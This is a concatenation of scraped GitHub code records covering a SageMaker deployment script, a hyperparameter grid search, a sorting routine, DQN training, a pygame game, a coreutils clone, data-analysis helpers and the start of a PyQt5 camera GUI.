type=str, default=\"staging-params-export.json\")\n parser.add_argument(\"--export-staging-tags\", type=str, default=\"staging-tags-export.json\")\n parser.add_argument(\"--export-cfn-params-tags\", type=bool, default=False)\n\n args, _ = parser.parse_known_args()\n\n # Configure logging to output the line number and message\n log_format = \"%(levelname)s: [%(filename)s:%(lineno)s] %(message)s\"\n logging.basicConfig(format=log_format, level=args.log_level)\n\n model_dir = Path(os.path.join(BASE_DIR, model_dir_name))\n\n if not os.path.isdir(os.path.join(BASE_DIR, model_dir_name)):\n model_dir.mkdir()\n\n with TemporaryDirectory() as tmpdir:\n # download snapshot\n snapshot_dir = snapshot_download(repo_id=args.hf_model_id, cache_dir=tmpdir)\n # copy snapshot to model dir\n copy_tree(snapshot_dir, str(model_dir))\n\n copy_tree(os.path.join(BASE_DIR, \"code\") + \"/\", str(model_dir.joinpath(\"code\")))\n\n compress(str(model_dir))\n\n model_url = sagemaker.Session().upload_data(\n os.path.join(BASE_DIR, \"model.tar.gz\"),\n bucket=args.default_bucket,\n key_prefix=\"/\".join([s3_model_path, args.model_name])\n )\n\n logger.info(\"S3 model url: {}\".format(model_url))\n\n model = HuggingFaceModel(\n name=args.model_name,\n transformers_version=args.inference_transformers_version,\n pytorch_version=args.inference_framework_version,\n py_version=args.inference_python_version,\n model_data=model_url,\n role=args.model_execution_role,\n sagemaker_session=sagemaker_session\n )\n\n container_def = model.prepare_container_def(instance_type=args.inference_instance_type)\n\n with ZipFile(os.path.join(BASE_DIR, \"lambda.zip\"), 'w') as zip_object:\n # Adding files that need to be zipped\n zip_object.write(os.path.join(BASE_DIR, \"lambda\", \"handler.py\"), \"lambda/handler.py\")\n\n lambda_url = sagemaker.Session().upload_data(\n os.path.join(BASE_DIR, \"lambda.zip\"),\n bucket=args.default_bucket,\n key_prefix=s3_artifacts_path\n )\n\n logger.info(\"S3 lambda url: {}\".format(lambda_url))\n\n # Write the staging config\n with open(args.import_staging_config, \"r\") as f:\n staging_config = extend_config(args, json.load(f), container_def)\n logger.debug(\"Staging config: {}\".format(json.dumps(staging_config, indent=4)))\n with open(args.export_staging_config, \"w\") as f:\n json.dump(staging_config, f, indent=4)\n if (args.export_cfn_params_tags):\n create_cfn_params_tags_file(staging_config, args.export_staging_params, args.export_staging_tags)\n\nif __name__ == \"__main__\":\n main()","repo_name":"brunopistone/flan-t5-multi-language","sub_path":"project/seedcode/ml-deploy/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":8096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73168393107","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nclass ValidateCoarseToFine():\n \"\"\"Class to perform a coarse-to-fine hyperparameter tuning\"\"\"\n def __init__(self, score, dir_name, exp_name, p1_init=1, p2_init=10, gamma1=3, gamma2=3, decay_factor=0.5, grid_size=3, freeze_p2=False, verbose=True, gamma_stop=1.05, p1_max=float('inf'), p2_max=float('inf'), **kwargs):\n \"\"\" Parameters\n ----------\n score: function\n function that takes as input the parameters and return a tuple (psnr, ssim, niter) corresponding to the average metrics over the validation set of a method. Nb: if freeze_p2 is True, the function should take only one parameter\n dir_name: string\n directory where to store the results\n exp_name: string\n name of the experiment to store the results\n p1_init: float\n initial value of the first parameter\n p2_init: float\n initial value of the second parameter\n gamma1: float\n initial multiplicative grid scale for the first parameter\n gamma2: float\n initial multiplicative grid scale for the second parameter\n decay_factor: float\n multiplicative factor to update the grid scale when going finer\n grid_size: int\n size of the local grid explore the performace of the method\n freeze_p2: bool\n if True, the second parameter is not optimized => faster procedure\n verbose: bool\n\n gamma_stop: float\n if gamma1 < gamma_stop and gamma2 < gamma_stop, the procedure stops. Should be > 1\n gamma_1_stop: float\n if defined, the stopping criterion for the first parameter, otherwise gamma_stop is used\n gamma_2_stop: float\n if defined, the stopping criterion for the first parameter, otherwise gamma_stop is used\n p1_max: float\n upper bound for the first parameter\n p2_max: float\n upper bound for the second parameter\n \"\"\"\n \n\n # the score function takes as input the parameters p1 (and possibily p2) and return tuple (psnr, ssim, niter)\n def score_modified(p1, p2):\n if self.freeze_p2:\n return(score(p1))\n else:\n return(score(p1, p2))\n\n self.score = score_modified\n\n # dir to store continuously the results\n self.dir_name = dir_name\n # name of the experiment\n self.exp_name = f\"validation_scores_{exp_name}\"\n\n # upper-bound, if any\n self.p1_max = p1_max\n self.p2_max = p2_max\n\n # initiliaze the parameters\n self.p1 = p1_init\n self.p2 = p2_init\n\n # initialize the grid scale in the two directions\n self.gamma1 = gamma1\n self.gamma2 = gamma2\n\n # decay factor to update grid scale\n self.decay_factor = decay_factor\n\n # local grid size\n self.grid_size = grid_size\n # tensor to store temporarily the scores on the local (grid_size x grid_size) grid\n self.psnr_grid = np.zeros((grid_size, grid_size))\n self.ssim_grid = np.zeros((grid_size, grid_size))\n \n # Dataframe to store all results computed\n cols = [\"exp\", \"p1\", \"p2\", \"psnr\", \"ssim\", \"niter\", \"date\"]\n dtype = [\"string\", \"float\", \"float\", \"float\", \"float\", \"float\", \"string\"]\n self.scores= pd.concat([pd.Series(name=col, dtype=dt) for col, dt in zip(cols, dtype)], axis=1)\n\n\n # verbose\n self.verbose = verbose\n\n # only optimize over p1\n self.freeze_p2 = freeze_p2\n\n gamma_1_stop = kwargs.get('gamma_1_stop', None)\n gamma_2_stop = kwargs.get('gamma_2_stop', None)\n\n if gamma_1_stop is None:\n self.gamma_1_stop = gamma_stop\n else:\n self.gamma_1_stop = gamma_1_stop\n\n if gamma_2_stop is None:\n self.gamma_2_stop = gamma_stop\n else:\n self.gamma_2_stop = gamma_2_stop\n\n \n\n\n # update scores on the local grid\n def update_scores(self):\n #print(\"---- computing scores on the updated local grid ----\")\n self.psnr_grid[:, :] = - np.inf\n self.ssim_grid[:, :] = - np.inf\n\n if self.freeze_p2:\n loop2 = 1\n else:\n loop2 = self.grid_size\n\n for k in range(self.grid_size):\n for j in range(loop2):\n\n\n p1 = self.p1*(self.gamma1)**k\n p2 = self.p2*(self.gamma2)**j\n\n \n \n # check if psnr already computed for (almost) the same parameters\n df_t = self.scores[((1 - self.scores[\"p1\"]/p1).abs()<(1e-4))]\n df_t = df_t[(df_t[\"p2\"]/p2 - 1).abs()<(1e-4)]\n \n sk = False\n sk_p1 = False\n sk_p2 = False\n\n def printLine(n):\n if self.verbose:\n print(\"\\n\")\n st = f'=== Effective iter {n} === Job {self.exp_name.replace(\"validation_scores_\", \"\")} ==='\n print(len(st)*\"_\")\n print(st)\n if self.freeze_p2:\n print(f\"=== Parameter: p1={p1:.2e}\")\n else:\n print(f\"=== Parameters: p1={p1:.2e}, p2={p2:.2e}\")\n\n if df_t.shape[0] > 0:\n psnr_t = df_t.iloc[0, 3]\n ssim_t = df_t.iloc[0, 4]\n niter_t = df_t.iloc[0, 5]\n sk = True\n self.psnr_grid[k, j] = psnr_t\n self.ssim_grid[k, j] = ssim_t\n printLine(len(self.scores))\n\n elif (p1 > self.p1_max):\n sk_p1 = True\n printLine(len(self.scores))\n elif (p2 > self.p2_max):\n sk_p2 = True\n printLine(len(self.scores))\n else:\n printLine(len(self.scores) + 1)\n psnr_t, ssim_t, niter_t = self.score(p1, p2)\n \n self.psnr_grid[k, j] = psnr_t\n self.ssim_grid[k, j] = ssim_t\n\n df2 = pd.DataFrame([[self.exp_name, p1, p2, psnr_t, ssim_t, niter_t, get_time_str()]], columns=self.scores.columns)\n self.scores = pd.concat((self.scores, df2))\n self.save_scores()\n \n \n if self.verbose:\n \n if not(sk_p1 or sk_p2):\n print(f\"\\n \\t psnr={psnr_t:.2f}dB (best {self.scores['psnr'].max():.2f}dB)\")\n if sk:\n print(f\" \\t \\t (computation skipped since found values for p1={df_t.iloc[0, 1]:.3f}, p2={df_t.iloc[0, 2]:.3f})\")\n if sk_p1:\n print(f\" \\t \\t (skipping value since p1 greater than {self.p1_max})\")\n if sk_p2:\n print(f\" \\t \\t (skipping value since p2 greater than {self.p2_max})\")\n \n #print(f\"SSIM {ssim_t:.3f} __ running max {self.scores['ssim'].max():.3f}\")\n \n def save_scores(self):\n self.scores.to_csv(f\"{self.dir_name}/{self.exp_name}.csv\")\n\n # update grid properties based on the scores\n def update_grid(self):\n print(\"\\n\")\n print(\"**** UPDATING THE GRID PARAMETERS ****\")\n ind = np.unravel_index(np.argmax(self.psnr_grid, axis=None), self.psnr_grid.shape)\n\n if ind[0] == 0:\n self.p1 = self.p1 * (self.gamma1)**(-(self.grid_size//2))\n print(\"-[p1] lower border hit => shifting grid down\")\n elif ind[0] == self.grid_size - 1:\n \n self.p1 = self.p1 * (self.gamma1)**(self.grid_size//2)\n print(\"-[p1] upper border hit => shifting grid up\")\n else:\n # find new center\n p1_new_center = self.p1*(self.gamma1)**ind[0]\n # reduce scale\n self.gamma1 = (self.gamma1**self.decay_factor)\n # update left point\n self.p1 = p1_new_center*self.gamma1**(-(self.grid_size//2))\n print(f\"-[p1] refinining the grid (corner {self.p1:.3e}, scale {self.gamma1:.3e})\")\n self.p1 = min(self.p1, self.p1_max)\n\n\n if not self.freeze_p2:\n if ind[1] == 0:\n print(\"-[p2] lower border hit => shifting grid down\")\n self.p2 = self.p2 * (self.gamma2)**(-(self.grid_size//2))\n \n elif ind[1] == self.grid_size - 1:\n print(\"-[p2] upper border hit => shifting grid up\")\n self.p2 = self.p2 * (self.gamma2)**(self.grid_size//2)\n \n else:\n # find new center\n p2_new_center = self.p2*(self.gamma2)**ind[0]\n # reduce scale\n self.gamma2 = (self.gamma2**self.decay_factor)\n # update left point\n self.p2 = p2_new_center*self.gamma2**(-(self.grid_size//2))\n print(f\"-[p2] refinining the grid (corner {self.p2:.3f}, scale {self.gamma2:.3f})\")\n self.p2 = min(self.p2, self.p2_max)\n\n def run(self):\n print(36*\"*\")\n print(f\"**** COARSE-TO-FINE GRID SEARCH ****\")\n print(36*\"*\")\n print(f\"\\t Job name: {self.exp_name}\")\n if self.freeze_p2:\n while self.gamma1 > self.gamma_1_stop:\n self.update_scores()\n self.update_grid()\n print(\" Job Done \")\n else:\n while (self.gamma1 > self.gamma_1_stop) or (self.gamma2 > self.gamma_2_stop):\n self.update_scores()\n self.update_grid()\n print(\" Job Done \")\n\n\ndef get_time_str():\n now = datetime.now()\n return(now.strftime(\"%Y/%m/%d, %H:%M:%S\"))","repo_name":"axgoujon/convex_ridge_regularizers","sub_path":"hyperparameter_tuning/validate_coarse_to_fine.py","file_name":"validate_coarse_to_fine.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"25878107902","text":"from numba import jit\n\nfrom coding_challenges.algo.sorts.sort_utils import swap\n\n\n@jit(nopython=True, nogil=True, fastmath=True)\ndef insertion_sort(arr, first: int, last: int) -> None:\n for current in range(first + 1, last + 1):\n unsorted = current\n # sinking unsorted down\n while unsorted > first and arr[unsorted] < arr[unsorted - 1]:\n swap(arr, unsorted, unsorted - 1)\n unsorted -= 1\n\n\nif __name__ == \"__main__\":\n arr = [5, 1, 6, 2, 7, 3, 8, 3, 7, 2]\n insertion_sort(arr, 0, len(arr) - 1)\n print(arr)\n","repo_name":"Yamp/home_lab","sub_path":"coding_challenges/algo/sorts/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4504979073","text":"import gym\nimport torch.optim as optim\nimport argparse\nimport warnings\nfrom dqn_model import DQN\nfrom dqn_learn import OptimizerSpec, dqn_learing\nfrom utils.gym import get_env, get_wrapper_by_name\nfrom utils.schedule import LinearSchedule\n\nBATCH_SIZE = 32\nGAMMA = 0.99\nREPLAY_BUFFER_SIZE = 1000000\nLEARNING_STARTS = 50000\nLEARNING_FREQ = 4\nFRAME_HISTORY_LEN = 4\nTARGER_UPDATE_FREQ = 10000\nLEARNING_RATE = 0.00025\nALPHA = 0.95\nEPS = 0.01\n\n\ndef main(task, seed, num_timesteps):\n parser = argparse.ArgumentParser(description='DQN on visual atari board')\n parser.add_argument('-g', '--gpu_idx', type=int, default=0)\n parser.add_argument('-ga', '--gamma', type=float, default=GAMMA)\n parser.add_argument('-l', '--learning', type=float, default=LEARNING_RATE)\n parser.add_argument('-lo', '--loss', default='MSE')\n parser.add_argument('-c', '--config_name', default='')\n parser.add_argument('-s', '--stats_name')\n parser.add_argument('-d', '--dir')\n parser.add_argument('-a', '--actor', default='greedy', help='greedy, softmax or noisy')\n parser.add_argument('-b', '--beta', type=float, default=1, help='softmax beta')\n parser.add_argument('--bsched', type=bool, default=False, help='beta scheduling')\n parser.add_argument('-i', '--init_std', type=float, default=1e-1, help='Initial std for noisy actor')\n parser.add_argument('-r', '--replay_buffer_size', type=int, default=REPLAY_BUFFER_SIZE)\n args = parser.parse_args()\n gpu_idx = args.gpu_idx\n\n if args.dir:\n direc = args.dir\n warnings.warn(\n \"args.dir is deprecated, use config_name instead\",\n DeprecationWarning\n )\n else:\n direc = 'tmp/gym-results/'\n if args.config_name:\n direc = f'{direc}{args.config_name}/'\n\n if args.stats_name:\n stats_name = args.stats_name\n warnings.warn(\n \"args.stats_name is deprecated, use config_name instead\",\n DeprecationWarning\n )\n else:\n stats_name = 'statistics.pkl'\n if args.config_name:\n stats_name = f'statistics_{args.config_name}.pkl'\n\n env = get_env(task, seed, direc, video_callable=False)\n\n def stopping_criterion(env_arg):\n # notice that here t is the number of steps of the wrapped env,\n # which is different from the number of steps in the underlying env\n return get_wrapper_by_name(env_arg, \"Monitor\").get_total_steps() >= num_timesteps\n\n optimizer_spec = OptimizerSpec(\n constructor=optim.RMSprop,\n kwargs=dict(lr=args.learning, alpha=ALPHA, eps=EPS),\n )\n\n exploration_schedule = LinearSchedule(1000000, 0.1)\n\n dqn_learing(\n env=env,\n q_func=DQN,\n optimizer_spec=optimizer_spec,\n exploration=exploration_schedule,\n stopping_criterion=stopping_criterion,\n replay_buffer_size=args.replay_buffer_size,\n batch_size=BATCH_SIZE,\n gamma=args.gamma,\n learning_starts=LEARNING_STARTS,\n learning_freq=LEARNING_FREQ,\n frame_history_len=FRAME_HISTORY_LEN,\n target_update_freq=TARGER_UPDATE_FREQ,\n gpu_idx=gpu_idx,\n loss=args.loss,\n stat_name=stats_name,\n actor_name=args.actor,\n beta=args.beta,\n init_std=args.init_std,\n bsched=args.bsched\n )\n\n\nif __name__ == '__main__':\n # Get Atari games.\n benchmark = gym.benchmark_spec('Atari40M')\n\n # Change the index to select a different game.\n # bm_task = benchmark.tasks[3] # pong\n bm_task = benchmark.tasks[1] # breakout\n\n # Run training\n main_seed = 0 # Use a seed of zero (you may want to randomize the seed!)\n\n main(bm_task, main_seed, bm_task.max_timesteps)\n","repo_name":"or-toledano/reinforcement-learning-dqn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3010358582","text":"import pygame\nfrom pygame.locals import *\nfrom pygame.sprite import Sprite, Group, groupcollide\nimport random\nfrom random import randint\n\nclass Character(Sprite):\n def __init__(self):\n super(Character, self).__init__()\n # self.rect = pygame.Rect(0,0,32,32)\n self.speed_x = 0\n self.speed_y = 0\n\nclass Hero(Character):\n def __init__(self, x, y):\n super() .__init__()\n self.x = x\n self.y = y\n self.image = pygame.image.load('images/hero.png')\n self.rect = self.image.get_rect()\n self.rect.centerx = self.x\n self.rect.top = self.y \n self.speed = 4\n self.should_move_down = False\n self.should_move_up = False\n self.should_move_left = False\n self.should_move_right = False\n\n def should_move(self, direction, start = True):\n if direction == \"right\":\n self.should_move_right = start\n if direction == \"left\":\n self.should_move_left = start\n if direction == \"up\":\n self.should_move_up = start\n if direction == \"down\":\n self.should_move_down = start \n\n def draw_me(self,w,h):\n if(self.should_move_right):\n if(self.x <= w - 64):\n self.x += self.speed\n elif(self.should_move_left):\n if(self.x >= 32):\n self.x -= self.speed\n elif(self.should_move_down):\n if(self.y <= h - 64):\n self.y += self.speed\n elif self.should_move_up:\n if(self.y >= 32):\n self.y -= self.speed \n self.rect.x = self.x \n self.rect.y = self.y\n \n def catch_monster(self, enemy):\n if self.x == enemy.x and self.y == enemy.y:\n print(\"collision detected\")\n enemy.kill()\n\nclass Monster(Character):\n def __init__(self, x, y):\n super() .__init__()\n self.x = x\n self.y = y\n self.image = pygame.image.load('images/monster.png')\n self.rect = self.image.get_rect()\n self.rect.centerx = self.x\n self.rect.top = self.y \n self.speed = 8\n \n def random_move(self,w,h):\n movements = [\"right\", \"up right\", \"down right\", \"left\", \"up left\", \"down left\", \"up\", \"down\"]\n random.shuffle(movements)\n i = movements[0]\n if i == \"right\":\n if self.x < w:\n self.x += self.speed\n else:\n self.x = 0\n self.x += self.speed\n elif i == \"up right\":\n if self.x < w and self.y > 0:\n self.x += self.speed \n self.y -= self.speed\n else:\n self.x = 0\n self.x += self.speed \n self.y = h\n self.y -= self.speed\n elif i == \"down right\":\n if self.x < w and self.y < h:\n self.x += self.speed\n self.y += self.speed\n else: \n self.x = 0\n self.x += self.speed \n self.y = 0\n self.y += self.speed\n elif i == \"left\":\n if self.x > 0:\n self.x -= self.speed\n else: \n self.x = w\n self.x -= self.speed \n elif i == \"up left\":\n if self.x > 0 and self.y > 0:\n self.x -= self.speed\n self.y -= self.speed \n else: \n self.x = w\n self.x -= self.speed \n self.y = h\n self.y -= self.speed \n elif i == \"down left\":\n if self.x > 0 and self.y < h:\n self.x -= self.speed\n self.y += self.speed\n else: \n self.x = w\n self.x -= self.speed \n self.y = 0\n self.y += self.speed\n elif i == \"down\":\n if self.y <= h:\n self.y += self.speed\n else:\n self.y = 0\n self.y += self.speed\n elif i == \"up\":\n if self.y >= 0:\n self.y -= self.speed \n else:\n self.y = h\n self.y -= self.speed \n self.rect.x = self.x \n self.rect.y = self.y\n pygame.time.delay(50)\n \n def kill(self):\n pygame.sprite.Sprite.kill(self)\n\n# instantiate Hero object & create sprite group\nthe_hero = Hero(100, 100)\nheroes = pygame.sprite.Group()\nheroes.add(the_hero)\n\n# instantiate Monster object & create sprite group\nthe_monster = Monster(250, 250)\nmonsters = pygame.sprite.Group()\nmonsters.add(the_monster)\n\ndef main():\n width = 512\n height = 480\n\n pygame.init()\n screen = pygame.display.set_mode((width, height))\n pygame.display.set_caption('Monster Chase')\n\n background_image = pygame.image.load('images/background.png')\n\n # Game initialization\n stop_game = False\n while not stop_game:\n for event in pygame.event.get():\n\n # Event handling\n\n if event.type == pygame.QUIT:\n stop_game = True\n\n # event listener for keydown\n elif event.type == pygame.KEYDOWN:\n if event.key == 275:\n the_hero.should_move(\"right\")\n elif event.key == 276: \n the_hero.should_move(\"left\")\n elif event.key == 273: \n the_hero.should_move(\"up\")\n elif event.key == 274: \n the_hero.should_move(\"down\")\n\n elif event.type == pygame.KEYUP:\n if event.key == 275: \n the_hero.should_move(\"right\", False)\n elif event.key == 276: #left arrow\n the_hero.should_move(\"left\", False)\n if event.key == 273: #up arrow\n the_hero.should_move(\"up\", False)\n elif event.key == 274: #down arrow\n the_hero.should_move(\"down\", False) \n\n # Draw game\n if stop_game == False:\n screen.blit(background_image, [0,0])\n\n for the_monster in monsters:\n screen.blit(the_monster.image, [the_monster.x, the_monster.y])\n the_monster.random_move(512, 480)\n\n for the_hero in heroes: \n the_hero.draw_me(512,480) \n the_hero.catch_monster(the_monster)\n screen.blit(the_hero.image, [the_hero.x, the_hero.y])\n\n # Game display\n pygame.display.flip()\n\n pygame.quit()\n\nif __name__ == '__main__':\n main()\n","repo_name":"katiejduane/DIR-ing","sub_path":"unit1_python/pygame-master/jb_monster-chase.py","file_name":"jb_monster-chase.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73966437584","text":"#!/usr/bin/env python\n\nimport os\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option(\"--version\", action=\"store_true\", dest=\"version\", help=\"output version information and exit\")\n\n(options, args) = parser.parse_args()\n\nif options.version:\n print('sync (pycoreutils) 0.1')\nelse:\n os.sync()\n","repo_name":"jelly/pycoreutils","sub_path":"src/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72250735185","text":"# imports\nimport pandas as pd; import missingno as msno; import matplotlib.pyplot as plt; import seaborn as sns;import numpy as np;import warnings\nfrom sklearn import preprocessing; from scipy import stats\nfrom sklearn.preprocessing import PowerTransformer\nfrom scipy.stats import normaltest\nfrom scipy.stats import ttest_ind, ks_2samp\nfrom scipy.stats import describe\n\n# settings\nnp.seterr(divide='warn', invalid='warn'); sns.set_style(\"whitegrid\");warnings.filterwarnings('ignore')\n\n# Import Files\nmf_num_data = pd.read_csv('bosch_small_data/train_numeric.csv',low_memory=False)\nprint('train_numeric.csv loaded...')\nmf_date_data = pd.read_csv('bosch_small_data/train_date.csv',low_memory=False)\nprint('train_date.csv loaded...')\nmf_cat_data = pd.read_csv('bosch_small_data/train_cat.csv',low_memory=False)\nprint('train_cat.csv loaded...')\n\n# Function for determining params of sample distribution\ndef distribution_assignment(sample):\n k2, p = normaltest(sample, nan_policy='omit')\n alpha = 0.00001 # null hypothesis: Sample comes from a normal distribution\n dist = 'Normally Distributed' if p < alpha else 'Not Normally Distributed'\n return dist\n\ndef sample_test(df,c, test, p_threshold):\n c = df.columns[c]\n a,b = df[c][df['Response']==0].dropna(), df[c][df['Response']==1].dropna()\n d,p = test(a,b)\n s = 'Different' if p < p_threshold else 'Same'\n return c,s,p,d\n\n# Function for different viz of distributions\ndef plot_dist(df, col_index, transformed):\n c = df.columns[col_index]\n normed = distribution_assignment(df[c])\n print(describe(df[c]))\n s_3 = df[c][np.abs(df[c]-df[c].mean()) <= (3*df[c].std())] # Keep inner 99.7 % of the Data\n s_1 = df[c][np.abs(df[c]-df[c].mean()) <= (1*df[c].std())] # Keep inner 68% of the Data\n transformed = transformed[~np.isnan(transformed)] # Show the complete transformation of mf_num_data\n \n plt.figure(figsize=(20,1))\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=1)\n \n plt.subplot(1, 2, 1)\n plt.title('Feature: {}\\nDistribution: {}\\n\\nOriginal\\nSample Count: {}'.format(c,normed,len(df[c].dropna())))\n sns.distplot(df[c].dropna(),color='blue')\n plt.xlabel('')\n\n s_success = df[c][df['Response']==0].dropna()\n s_failure = df[c][df['Response']==1].dropna()\n sampling_results = sample_test(df,col_index, ks_2samp,.1)\n \n plt.subplot(1, 2, 2)\n sns.distplot(s_success)\n plt.xlabel('')\n \n plt.subplot(1, 2, 2)\n plt.title('Success/Failure\\n\\n{}\\nSuccess Count: {}\\nFailure Count: {}'.format(sampling_results,len(s_success),len(s_failure)))\n sns.distplot(s_failure,color='purple')\n plt.xlabel('')\n plt.legend(['Success','Failure'])\n \npt = PowerTransformer()","repo_name":"kimrharper/data_science_nltk","sub_path":"manufacturing/utils/mf_stats_analysis.py","file_name":"mf_stats_analysis.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14612242640","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Guide: open conda tensorflow_cpu : cd to the folder save file.ui: comment: pyuic5 -x test.ui -o test.py\n# convert ipynb to py ### comment: ipython nbconvert --to script \"PyQt5_v10.ipynb\"\n# convert py to exe:\n# # comment in conda with direction from file.py: pip install pyinstaller\n # pyinstaller PyQt5_v10.py\n\n\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QTextEdit, QDialog\nfrom PyQt5 import uic\nimport sys\nimport cv2\n\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtGui import QImage\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom collections import deque\nfrom imutils.video import VideoStream\nimport numpy as np\nimport argparse\nimport imutils\nimport time\n\nfrom detector import detect_frame \n\nbuffer = 32\n\ngreenLower = (29, 86, 6)\ngreenUpper = (64, 255, 255)\n#greenUpper = (225, 100, 70)\n\npts = deque(maxlen=buffer)\ncounter = 0\n(dX, dY) = (0, 0)\ndirection = \"\"\n\ntime.sleep(2.0)\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(900, 600)\n self.imgLabel_1 = QtWidgets.QLabel(Dialog)\n self.imgLabel_1.setGeometry(QtCore.QRect(150, 80, 471, 441))\n self.imgLabel_1.setAutoFillBackground(False)\n self.imgLabel_1.setFrameShape(QtWidgets.QFrame.Box)\n self.imgLabel_1.setFrameShadow(QtWidgets.QFrame.Raised)\n self.imgLabel_1.setLineWidth(2)\n self.imgLabel_1.setScaledContents(True)\n self.imgLabel_1.setObjectName(\"imgLabel_1\")\n self.SHOW = QtWidgets.QPushButton(Dialog)\n self.SHOW.setGeometry(QtCore.QRect(10, 80, 71, 31))\n self.SHOW.setObjectName(\"SHOW\")\n self.CAPTURE = QtWidgets.QPushButton(Dialog)\n self.CAPTURE.setGeometry(QtCore.QRect(10, 120, 131, 51))\n self.CAPTURE.setObjectName(\"CAPTURE\")\n self.TEXT = QtWidgets.QTextBrowser(Dialog)\n self.TEXT.setGeometry(QtCore.QRect(10, 10, 256, 61))\n self.TEXT.setObjectName(\"TEXT\")\n self.imgLabel_2 = QtWidgets.QLabel(Dialog)\n self.imgLabel_2.setGeometry(QtCore.QRect(630, 80, 220, 220))\n self.imgLabel_2.setFrameShape(QtWidgets.QFrame.Box)\n self.imgLabel_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.imgLabel_2.setLineWidth(2)\n self.imgLabel_2.setScaledContents(True)\n self.imgLabel_2.setObjectName(\"imgLabel_2\")\n self.imgLabel_3 = QtWidgets.QLabel(Dialog)\n self.imgLabel_3.setGeometry(QtCore.QRect(630, 305, 220, 215))\n self.imgLabel_3.setFrameShape(QtWidgets.QFrame.Box)\n self.imgLabel_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.imgLabel_3.setLineWidth(2)\n self.imgLabel_3.setScaledContents(True)\n self.imgLabel_3.setObjectName(\"imgLabel_3\")\n # self.imgLabel_4 = QtWidgets.QLabel(Dialog)\n # self.imgLabel_4.setGeometry(QtCore.QRect(630, 400, 151, 121))\n # self.imgLabel_4.setFrameShape(QtWidgets.QFrame.Box)\n # self.imgLabel_4.setFrameShadow(QtWidgets.QFrame.Raised)\n # self.imgLabel_4.setLineWidth(2)\n # self.imgLabel_4.setScaledContents(True)\n # self.imgLabel_4.setObjectName(\"imgLabel_4\")\n self.TEXT_2 = QtWidgets.QTextBrowser(Dialog)\n self.TEXT_2.setGeometry(QtCore.QRect(10, 310, 131, 31))\n font = QtGui.QFont()\n font.setPointSize(9)\n # self.TEXT_2.setFont(font)\n # self.TEXT_2.setObjectName(\"TEXT_2\")\n # self.TEXT_3 = QtWidgets.QTextBrowser(Dialog)\n # self.TEXT_3.setGeometry(QtCore.QRect(10, 270, 101, 31))\n # self.TEXT_3.setObjectName(\"TEXT_3\")\n # self.TEXT_4 = QtWidgets.QTextBrowser(Dialog)\n # self.TEXT_4.setGeometry(QtCore.QRect(10, 310, 101, 31))\n # self.TEXT_4.setObjectName(\"TEXT_4\")\n # self.TEXT_5 = QtWidgets.QTextBrowser(Dialog)\n # self.TEXT_5.setGeometry(QtCore.QRect(10, 350, 101, 31))\n # self.TEXT_5.setObjectName(\"TEXT_5\")\n self.TEXT_6 = QtWidgets.QTextBrowser(Dialog)\n self.TEXT_6.setGeometry(QtCore.QRect(90, 80, 51, 31))\n self.TEXT_6.setObjectName(\"TEXT_6\")\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(20, 289, 111, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.imgLabel_1.setText(_translate(\"Dialog\", \"TextLabel\"))\n self.SHOW.setText(_translate(\"Dialog\", \"Show\"))\n self.CAPTURE.setText(_translate(\"Dialog\", \"Capture Screen Shot\"))\n self.imgLabel_2.setText(_translate(\"Dialog\", \"TextLabel\"))\n self.imgLabel_3.setText(_translate(\"Dialog\", \"TextLabel\"))\n #self.imgLabel_4.setText(_translate(\"Dialog\", \"TextLabel\"))\n self.label.setText(_translate(\"Dialog\", \"IOU SCORE\"))\n\n\nclass MainWindow(QWidget):\n # class constructor\n def __init__(self):\n # call QWidget constructor\n super().__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n\n # create a timer\n self.timer = QTimer()\n # set timer timeout callback function\n self.timer.timeout.connect(self.viewCam)\n \n self.ui.SHOW.clicked.connect(self.controlTimer)\n \n self.logic = 0\n self.value = 1\n self.ui.CAPTURE.clicked.connect(self.CaptureClicked)\n \n def CaptureClicked(self):\n self.logic =2\n \n def viewCam(self):\n self.ui.TEXT.setText('Kindly Press \"Capture Image\" to capture image')\n \n # self.cap = cv2.VideoCapture(0)\n # start timer\n #self.timer.start(20)\n # read image in BGR format\n ret, image = self.cap.read()\n \n # convert image to RGB format\n image = imutils.resize(image, width=600)\n \n \n # convert image to RGB format \n image = 